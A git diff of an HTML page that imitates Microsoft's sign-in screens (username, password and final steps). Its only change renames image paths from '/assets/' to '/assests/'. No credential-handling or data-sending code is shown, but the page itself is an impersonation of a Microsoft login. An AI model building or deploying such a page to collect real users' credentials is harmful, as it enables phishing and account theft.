--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
 <body>
     <section id="section_uname">
         <div class="auth-wrapper">
-            <img src="/assets/logo.png" alt="Microsoft" />
+            <img src="/assests/logo.png" alt="Microsoft" />
             <h2 class="title mb-16 mt-16">Sign in</h2>
             <form>
                 <div class="mb-16">
@@ -25,7 +25,7 @@
                 <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p>
                 <p class="mb-16 fs-13">
                     <a href="#" class="link">Sign in with a security key
-                        <img src="/assets/question.png" alt="Question img">
+                        <img src="/assests/question.png" alt="Question img">
                     </a>
                 </p>
             </div>
@@ -34,17 +34,17 @@
             </div>
         </div>
         <div class="opts">
-            <p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="/assets/key.png"
+            <p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="/assests/key.png"
                         width="30px" /></span> Sign-in options</p>
         </div>
     </section>
 
     <section id="section_pwd" class="d-none">
         <div class="auth-wrapper">
-            <img src="/assets/logo.png" alt="Microsoft" class="d-block" />
+            <img src="/assests/logo.png" alt="Microsoft" class="d-block" />
             <div class="identity w-100 mt-16 mb-16">
                 <button class="back">
-                    <img src="/assets/back.png" />
+                    <img src="/assests/back.png" />
                 </button>
                 <span id="user_identity">a@b.com</span>
             </div>
@@ -69,7 +69,7 @@
 
     <section id="section_final" class="d-none">
         <div class="auth-wrapper">
-            <img src="/assets/logo.png" alt="Microsoft" class="d-block" />
+            <img src="/assests/logo.png" alt="Microsoft" class="d-block" />
             <div class="identity w-100 mt-16 mb-16">
                 <span id="user_identity">a@b.com</span>
             </div>
